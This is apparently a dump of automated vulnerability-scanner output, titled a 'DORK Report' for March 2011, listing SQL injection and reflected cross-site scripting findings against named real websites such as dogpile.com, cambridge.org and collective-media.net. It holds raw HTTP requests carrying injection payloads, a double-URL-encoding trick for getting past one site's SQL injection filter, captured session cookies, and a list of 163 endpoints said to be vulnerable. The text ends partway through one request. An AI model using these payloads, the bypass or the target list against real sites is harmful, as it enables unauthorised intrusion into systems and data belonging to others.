XSS, CWE-79, CAPEC-86, Cross Site Scripting, DORK Report for March 29, 2011

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /favicon.ico' HTTP/1.1
Host: politicalwire.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 15:46:04 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
Content-Length: 2389
Content-Type: text/html

<b>Error:</b> pdo error: [1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/') or (fileinfo_url like '/favicon.ico'/index%'))
and te' at line 2] in EXECUT
...[SNIP]...

Request 2

GET /favicon.ico'' HTTP/1.1
Host: politicalwire.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not found
Date: Fri, 01 Apr 2011 15:46:06 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
Content-Length: 22567
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

1.2. http://www.cambridge.org/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.cambridge.org
Path:	/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cambridge.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/6.0
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 283
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 16:20:01 GMT
Connection: close
Set-Cookie: ASPSESSIONIDAABDSSSR=KCLAEEPCNJAMKMPJHPPHKMKP; path=/
Set-Cookie: X-Mapping-kcepobcd=C0FA88536D2ACF6BAE87466C1724671A; path=/

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for Oracle</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>ORA-00911: invalid character
</font>
<p>
<fon
...[SNIP]...

1.3. http://www.dogpile.com/dogpile_other/ws/index [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/index

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /dogpile_other/ws/index HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=f1e07d8163f9435e87f8c16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com
Referer: http://www.google.com/search?hl=en&q='

Response 1 (redirected)

Request 2

Response 2

1.4. http://www.dogpile.com/dogpile_other/ws/index [wsViewRecent cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/index

Issue detail

The wsViewRecent cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the wsViewRecent cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /dogpile_other/ws/index HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1%2527; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=f1e07d8163f9435e87f8c16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response 1 (redirected)

Request 2

GET /dogpile_other/ws/index HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1%2527%2527; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=f1e07d8163f9435e87f8c16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response 2

2. Cross-site scripting (reflected) previous next
There are 163 instances of this issue:

http://a.collective-media.net/adj/ns.androidtapp/general [REST URL parameter 2]
http://a.collective-media.net/adj/ns.androidtapp/general [REST URL parameter 3]
http://a.collective-media.net/adj/ns.androidtapp/general [name of an arbitrarily supplied request parameter]
http://a.collective-media.net/adj/ns.androidtapp/general [ppos parameter]
http://a.collective-media.net/cmadj/ns.androidtapp/general [REST URL parameter 1]
http://a.collective-media.net/cmadj/ns.androidtapp/general [REST URL parameter 2]
http://a.collective-media.net/cmadj/ns.androidtapp/general [REST URL parameter 3]
http://a.collective-media.net/cmadj/ns.androidtapp/general [ppos parameter]
http://ads.adxpose.com/ads/ads.js [uid parameter]
http://api.ipinfodb.com/v2/ip_query_country.php [callback parameter]
http://api.ipinfodb.com/v2/ip_query_country.php [name of an arbitrarily supplied request parameter]
http://b.scorecardresearch.com/beacon.js [c1 parameter]
http://b.scorecardresearch.com/beacon.js [c15 parameter]
http://b.scorecardresearch.com/beacon.js [c2 parameter]
http://b.scorecardresearch.com/beacon.js [c3 parameter]
http://b.scorecardresearch.com/beacon.js [c4 parameter]
http://b.scorecardresearch.com/beacon.js [c5 parameter]
http://b.scorecardresearch.com/beacon.js [c6 parameter]
http://event.adxpose.com/event.flow [uid parameter]
http://ib.adnxs.com/ab [cnd parameter]
http://manhattan.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 1]
http://manhattan.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 2]
http://manhattan.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 3]
http://manhattan.ny1.com/Content/ServeContent.aspx [REST URL parameter 1]
http://manhattan.ny1.com/Content/ServeContent.aspx [REST URL parameter 2]
http://manhattan.ny1.com/Content/ServeResource.aspx [REST URL parameter 1]
http://manhattan.ny1.com/Content/ServeResource.aspx [REST URL parameter 2]
http://manhattan.ny1.com/content/top_stories/ [REST URL parameter 1]
http://manhattan.ny1.com/content/top_stories/ [REST URL parameter 2]
http://manhattan.ny1.com/content/top_stories/ [name of an arbitrarily supplied request parameter]
http://pixel.fetchback.com/serve/fb/pdc [name parameter]
http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]
http://suggest.infospace.com/QuerySuggest/SuggestServlet [reqID parameter]
http://view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]
http://view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]
http://view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]
http://view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]
http://view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]
http://view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]
http://view.c3metrics.com/v.js [cid parameter]
http://view.c3metrics.com/v.js [id parameter]
http://view.c3metrics.com/v.js [t parameter]
http://www.aeriagames.com/favicon.ico [REST URL parameter 1]
http://www.aeriagames.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.aeriagames.com/meebo.html [REST URL parameter 1]
http://www.aeriagames.com/themes/main/favicon.ico [REST URL parameter 3]
http://www.aeriagames.com/themes/main/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.androidtapp.com/favicon.ico [REST URL parameter 1]
http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49 [REST URL parameter 1]
http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49 [REST URL parameter 2]
http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49 [name of an arbitrarily supplied request parameter]
http://www.androidtapp.com/wp-admin/css/colors-fresh.css [REST URL parameter 1]
http://www.androidtapp.com/wp-admin/css/colors-fresh.css [REST URL parameter 2]
http://www.androidtapp.com/wp-admin/css/colors-fresh.css [REST URL parameter 3]
http://www.androidtapp.com/wp-admin/css/login.css [REST URL parameter 1]
http://www.androidtapp.com/wp-admin/css/login.css [REST URL parameter 2]
http://www.androidtapp.com/wp-admin/css/login.css [REST URL parameter 3]
http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 1]
http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 2]
http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 3]
http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 4]
http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 1]
http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 2]
http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 3]
http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 4]
http://www.androidtapp.com/wp-content/plugins/wp-postratings/postratings-js.js [REST URL parameter 1]
http://www.androidtapp.com/wp-content/plugins/wp-postratings/postratings-js.js [REST URL parameter 2]
http://www.androidtapp.com/wp-content/plugins/wp-postratings/postratings-js.js [REST URL parameter 3]
http://www.androidtapp.com/wp-content/plugins/wp-postratings/postratings-js.js [REST URL parameter 4]
http://www.androidtapp.com/wp-content/themes/AndroidTappv3/favicon.ico [REST URL parameter 1]
http://www.androidtapp.com/wp-content/themes/AndroidTappv3/favicon.ico [REST URL parameter 2]
http://www.androidtapp.com/wp-content/themes/AndroidTappv3/favicon.ico [REST URL parameter 3]
http://www.androidtapp.com/wp-content/themes/AndroidTappv3/favicon.ico [REST URL parameter 4]
http://www.androidtapp.com/wp-includes/js/jquery/jquery.js [REST URL parameter 1]
http://www.androidtapp.com/wp-includes/js/jquery/jquery.js [REST URL parameter 2]
http://www.androidtapp.com/wp-includes/js/jquery/jquery.js [REST URL parameter 3]
http://www.androidtapp.com/wp-includes/js/jquery/jquery.js [REST URL parameter 4]
http://www.androidtapp.com/wp-login.php [REST URL parameter 1]
http://www.autobytel.com/favicon.ico [REST URL parameter 1]
http://www.beatthetraffic.com/widgets/traveltimes.aspx [partner parameter]
http://www.cambridge.org/favicon.ico [REST URL parameter 1]
http://www.cambridge.org/uk/404_error.asp [REST URL parameter 2]
http://www.cambridge.org/uk/404_error.asp [error parameter]
http://www.cambridge.org/uk/catalogue/images/ecomm_logo.gif [REST URL parameter 2]
http://www.cambridge.org/uk/catalogue/images/ecomm_logo.gif [REST URL parameter 3]
http://www.cambridge.org/uk/catalogue/images/ecomm_logo.gif [REST URL parameter 4]
http://www.cambridge.org/uk/catalogue/images/ecomm_logo.gif [name of an arbitrarily supplied request parameter]
http://www.cambridge.org/uk/catalogue/viewBasket.asp [REST URL parameter 2]
http://www.cambridge.org/uk/catalogue/viewBasket.asp [REST URL parameter 3]
http://www.dmvnow.com/favicon.ico [REST URL parameter 1]
http://www.dogpile.com/dogpile/ws/redir/_iceUrlFlag=11 [qcat parameter]
http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11 [icePage%24SearchBoxTop%24qcat parameter]
http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11 [icePage%24SearchBoxTop%24qcat parameter]
http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11 [qcat parameter]
http://www.dogpile.com/dogpile_rss/ws/redir/_iceUrlFlag=11 [qcat parameter]
http://www.dogpile.com/dogpile_rss/ws/redir/_iceUrlFlag=11 [qcat parameter]
http://www.dogpile.com/dogpile_rss/ws/redir/_iceUrlFlag=11 [qcat parameter]
http://www.kicksonfire.com/favicon.ico [REST URL parameter 1]
http://www.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 1]
http://www.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 2]
http://www.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 3]
http://www.ny1.com/Content/ServeContent.aspx [REST URL parameter 1]
http://www.ny1.com/Content/ServeContent.aspx [REST URL parameter 2]
http://www.ny1.com/Content/ServeResource.aspx [REST URL parameter 1]
http://www.ny1.com/Content/ServeResource.aspx [REST URL parameter 2]
http://www.ny1.com/favicon.ico [80003'-alert(1)-'46fe3f653ad parameter]
http://www.ny1.com/favicon.ico [REST URL parameter 1]
http://www.ny1.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.ottawacitizen.com/favicon.ico [REST URL parameter 1]
http://www.quickyellow.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.swiftpage1.com/favicon.ico [REST URL parameter 1]
http://www.swiftpage1.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.viagra.com/favicon.ico [REST URL parameter 1]
http://www.viagra.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://community.dogpile.com/ [User-Agent HTTP header]
http://support.dogpile.com/pressroom/ [User-Agent HTTP header]
http://www.blacksingles.com/favicon.ico [Referer HTTP header]
http://www.palomar.edu/favicon.ico [Referer HTTP header]
http://www.palomar.edu/favicon.ico [User-Agent HTTP header]
http://a.collective-media.net/cmadj/ns.androidtapp/general [cli cookie]
http://dogpile.com/dogpile/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11 [DomainSession cookie]
http://view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]
http://www.8tracks.com/favicon.ico [REST URL parameter 1]
http://www.8tracks.com/favicon.ico [REST URL parameter 1]
http://www.dogpile.com/dogpile/ws/about/_iceUrlFlag=11 [DomainSession cookie]
http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11 [DomainSession cookie]
http://www.dogpile.com/dogpile/ws/contactUs/rfcid=1293/rfcp=left/_iceUrlFlag=11 [DomainSession cookie]
http://www.dogpile.com/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11 [DomainSession cookie]
http://www.dogpile.com/dogpile/ws/results/Web/april%20fools%20day%20pranks/1/42/Seasonal/Relevance/ [DomainSession cookie]
http://www.dogpile.com/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11 [DomainSession cookie]
http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11 [DomainSession cookie]
http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11 [DomainSession cookie]
http://www.dogpile.com/dogpile_other/ws/index [DomainSession cookie]
http://www.dogpile.com/dogpile_other/ws/index [DomainSession cookie]
http://www.dogpile.com/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11 [DomainSession cookie]
http://www.dogpile.com/dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11 [DomainSession cookie]
http://www.dogpile.com/dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11 [DomainSession cookie]
http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11 [DomainSession cookie]
http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Dark%20Sites/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11 [DomainSession cookie]
http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Review%20Sites/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11 [DomainSession cookie]
http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Submit%20Site/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11 [DomainSession cookie]
http://www.dogpile.com/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7 [DomainSession cookie]
http://www.dogpile.com/dogpile_rss/web/GE+Zero+Taxes [DomainSession cookie]
http://www.dogpile.com/dogpile_rss/web/Go+Daddy+CEO+Elephant [DomainSession cookie]
http://www.dogpile.com/dogpile_rss/ws/about/_iceUrlFlag=11 [DomainSession cookie]
http://www.dogpile.com/dogpile_rss/ws/faq/_iceUrlFlag=11 [DomainSession cookie]
http://www.dogpile.com/dogpile_rss/ws/index/ [DomainSession cookie]
http://www.dogpile.com/favicon.ico [DomainSession cookie]
http://www.dogpile.com/info.dogpl.rss/Web6c5ea//' [DomainSession cookie]
http://www.dogpile.com/info.dogpl.rss/web/GE+Zero+Taxes [DomainSession cookie]
http://www.dogpile.com/info.dogpl.rss/web/Go+Daddy+CEO+Elephant [DomainSession cookie]
http://www.dogpile.com/info.dogpl.rss/web/MLB+Schedule [DomainSession cookie]
http://www.force.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.force.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.mercantila.com/website/shoppingcart/cartbroker.php [merc_uid cookie]
http://www.mrnumber.com/favicon.ico [REST URL parameter 1]
http://www.mrnumber.com/favicon.ico [REST URL parameter 1]
http://www.mrnumber.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.mrnumber.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.opinionoutpost.com/favicon.ico [REST URL parameter 1]
http://www.opinionoutpost.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.rateyourmusic.com/favicon.ico [REST URL parameter 1]
http://www.rateyourmusic.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.1. http://a.collective-media.net/adj/ns.androidtapp/general [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/ns.androidtapp/general

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7384'-alert(1)-'7c333334a54 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/ns.androidtappc7384'-alert(1)-'7c333334a54/general;ppos=atf;kw=;tile=2;sz=300x250,300x600;ord=4522430587094277? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; nadp=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 484
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:11 GMT
Connection: close
Set-Cookie: dc=dc-dal-sea; domain=collective-media.net; path=/; expires=Sun, 01-May-2011 18:15:11 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.androidtappc7384'-alert(1)-'7c333334a54/general;ppos=atf;kw=;tile=2;sz=300x250,300x600;net=ns;ord=4522430587094277;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.2. http://a.collective-media.net/adj/ns.androidtapp/general [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/ns.androidtapp/general

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb9e1'-alert(1)-'613b7c7ac4f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/ns.androidtapp/generalbb9e1'-alert(1)-'613b7c7ac4f;ppos=atf;kw=;tile=2;sz=300x250,300x600;ord=4522430587094277? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; nadp=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 484
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:12 GMT
Connection: close
Set-Cookie: dc=dc-dal-sea; domain=collective-media.net; path=/; expires=Sun, 01-May-2011 18:15:12 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.androidtapp/generalbb9e1'-alert(1)-'613b7c7ac4f;ppos=atf;kw=;tile=2;sz=300x250,300x600;net=ns;ord=4522430587094277;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.3. http://a.collective-media.net/adj/ns.androidtapp/general [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/ns.androidtapp/general

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 347a8'-alert(1)-'d4c2fe2cbc9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/ns.androidtapp/general;ppos=atf;kw=;tile=2;sz=300x250,300x600;ord=4522430587094277?&347a8'-alert(1)-'d4c2fe2cbc9=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; nadp=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 488
Date: Fri, 01 Apr 2011 18:15:11 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc-dal-sea; domain=collective-media.net; path=/; expires=Sun, 01-May-2011 18:15:11 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.androidtapp/general;ppos=atf;kw=;tile=2;sz=300x250,300x600;net=ns;ord=4522430587094277?&347a8'-alert(1)-'d4c2fe2cbc9=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.4. http://a.collective-media.net/adj/ns.androidtapp/general [ppos parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/ns.androidtapp/general

Issue detail

The value of the ppos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 325d1'-alert(1)-'e054d2cf3d2 was submitted in the ppos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/ns.androidtapp/general;ppos=atf;kw=;tile=2;sz=300x250,300x600;ord=4522430587094277?325d1'-alert(1)-'e054d2cf3d2 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
